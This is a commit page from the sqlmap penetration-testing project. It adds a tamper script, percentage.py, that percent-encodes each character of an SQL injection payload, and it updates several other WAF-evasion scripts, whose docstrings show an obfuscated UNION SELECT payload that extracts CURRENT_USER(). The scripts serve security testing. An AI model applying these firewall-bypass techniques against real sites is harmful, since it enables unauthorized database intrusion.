Skip to content

Commit 05cb65b

Browse files
bdamelebdamele
committed
Added one more tamper script from Roberto Salgado and minor adjustment to others
1 parent 3985a81 commit 05cb65b

8 files changed

Lines changed: 71 additions & 14 deletions

tamper/equaltolike.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -17,7 +17,7 @@
1717
__priority__ = PRIORITY.HIGHEST
1818

1919
def dependencies():
20-
singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__)[:-3], DBMS.PGSQL))
20+
singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL))
2121

2222
def tamper(payload):
2323
"""

tamper/halfversionedmorekeywords.py

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@
1919
__priority__ = PRIORITY.HIGHER
2020

2121
def dependencies():
22-
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.0" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
22+
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
2323

2424
def tamper(payload):
2525
"""
@@ -30,10 +30,10 @@ def tamper(payload):
3030
* Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
3131
3232
Requirement:
33-
* MySQL < 5.0
33+
* MySQL < 5.1
3434
3535
Tested against:
36-
* MySQL 4.0.18
36+
* MySQL 4.0.18, 5.0.22
3737
3838
Notes:
3939
* Useful to bypass several web application firewalls when the

tamper/percentage.py

Lines changed: 56 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,56 @@
1+
#!/usr/bin/env python
2+
3+
"""
4+
$Id$
5+
6+
Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
7+
See the file 'doc/COPYING' for copying permission
8+
"""
9+
10+
import os
11+
import string
12+
13+
from lib.core.enums import PRIORITY
14+
from lib.core.common import singleTimeWarnMessage
15+
16+
__priority__ = PRIORITY.LOW
17+
18+
def dependencies():
19+
singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP web applications" % os.path.basename(__file__).split(".")[0])
20+
21+
def tamper(payload):
22+
"""
23+
Adds a percentage sign ('%') infront of each character
24+
25+
Example:
26+
* Input: SELECT FIELD FROM TABLE
27+
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
28+
29+
Requirement:
30+
* ASP
31+
32+
Tested against:
33+
* Microsoft SQL Server 2000, 2005
34+
* MySQL 5.1.56, 5.5.11
35+
* PostgreSQL 9.0
36+
37+
Notes:
38+
* Useful to bypass weak and bespoke web application firewalls
39+
"""
40+
41+
if payload:
42+
retVal = ""
43+
i = 0
44+
45+
while i < len(payload):
46+
if payload[i] == '%' and (i < len(payload) - 2) and payload[i+1] in string.hexdigits and payload[i+2] in string.hexdigits:
47+
retVal += payload[i:i+3]
48+
i += 3
49+
elif payload[i] != ' ':
50+
retVal += '%%%s' % payload[i]
51+
i += 1
52+
else:
53+
retVal += payload[i]
54+
i += 1
55+
56+
return retVal

tamper/space2extrarandomblank.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -17,7 +17,7 @@
1717
__priority__ = PRIORITY.LOW
1818

1919
def dependencies():
20-
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
20+
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
2121

2222
def tamper(payload):
2323
"""

tamper/space2morepound.py

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -21,7 +21,7 @@
2121
__priority__ = PRIORITY.LOW
2222

2323
def dependencies():
24-
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
24+
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
2525

2626
def tamper(payload):
2727
"""
@@ -40,6 +40,8 @@ def tamper(payload):
4040
4141
Notes:
4242
* Useful to bypass several web application firewalls
43+
* Used during the ModSecurity SQL injection challenge,
44+
http://modsecurity.org/demo/challenge.html
4345
"""
4446

4547
def process(match):

tamper/space2pound.py

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@
1818
__priority__ = PRIORITY.LOW
1919

2020
def dependencies():
21-
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
21+
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
2222

2323
def tamper(payload):
2424
"""
@@ -37,6 +37,8 @@ def tamper(payload):
3737
3838
Notes:
3939
* Useful to bypass several web application firewalls
40+
* Used during the ModSecurity SQL injection challenge,
41+
http://modsecurity.org/demo/challenge.html
4042
"""
4143

4244
retVal = ""

tamper/versionedkeywords.py

Lines changed: 2 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@
1818
__priority__ = PRIORITY.HIGHER
1919

2020
def dependencies():
21-
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
21+
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
2222

2323
def tamper(payload):
2424
"""
@@ -32,9 +32,7 @@ def tamper(payload):
3232
* MySQL
3333
3434
Tested against:
35-
* MySQL 4.0.18
36-
* MySQL 5.1.56
37-
* MySQL 5.5.11
35+
* MySQL 4.0.18, 5.1.56, 5.5.11
3836
3937
Notes:
4038
* Useful to bypass several web application firewalls when the

tamper/versionedmorekeywords.py

Lines changed: 2 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@
1919
__priority__ = PRIORITY.HIGHER
2020

2121
def dependencies():
22-
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s >= 5.1.13" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
22+
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s >= 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
2323

2424
def tamper(payload):
2525
"""
@@ -33,8 +33,7 @@ def tamper(payload):
3333
* MySQL >= 5.1.13
3434
3535
Tested against:
36-
* MySQL 5.1.56
37-
* MySQL 5.5.11
36+
* MySQL 5.1.56, 5.5.11
3837
3938
Notes:
4039
* Useful to bypass several web application firewalls when the

0 commit comments

Comments
 (0)